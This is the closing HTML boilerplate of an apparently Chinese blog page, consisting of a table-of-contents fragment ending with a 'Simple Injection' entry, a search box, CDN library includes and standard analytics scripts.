toc-level-2"><a class="toc-link" href="#Simple-Injection"><span class="toc-number">1.15.</span> <span class="toc-text">Simple Injection</span></a></li></ol></li></ol>
                                  </div>
                              </button>
                          
                          
                      
                    
                      <a href="#nexmoe-content" class="toc-link" aria-label="回到顶部" title="top"><button class="mdui-fab mdui-ripple"><i class="nexmoefont icon-caret-top"></i></button></a>
                  </div>
              </div>
            </div>
        </div>
    </div>
     
    <div id="nexmoe-search-space">
        <div class="search-container">
            <div class="search-header">
                <div class="search-input-container">
                    <input class="search-input" type="text" placeholder="搜索" oninput="sinput();">
                </div>
                <a class="search-close" onclick="sclose();">×</a>
            </div>
            <div class="search-body"></div>
        </div>
    </div>

    <script src="https://cdn.jsdelivr.net/combine/npm/lazysizes@5.1.0/lazysizes.min.js,npm/mdui@0.4.3/dist/js/mdui.min.js?v=1"></script>
<script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>

 

<script async src="/js/app.js?v=1641264017451"></script>



<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js"></script>
<script>
	$(".justified-gallery").justifiedGallery({
		rowHeight: 160,
		margins: 10,
	});
</script>


    


    <!-- CNZZ Analytics -->
<div hidden>
    <script src="//s95.cnzz.com/z_stat.php?id=1280753295&web_id=1280753295" language="JavaScript"></script>
</div>




    <!-- baidu Analytics -->
<script>
    var _hmt = _hmt || [];
    (function() {var hm = document.createElement('script');
    hm.src = 'https://hm.baidu.com/hm.js?f254d2c7295bf4323b22dfe1f8760f82';
    var s = document.getElementsByTagName('script')[0];
        s.parentNode.insertBefore(hm, s);
    })();
</script>

</body>

</html>
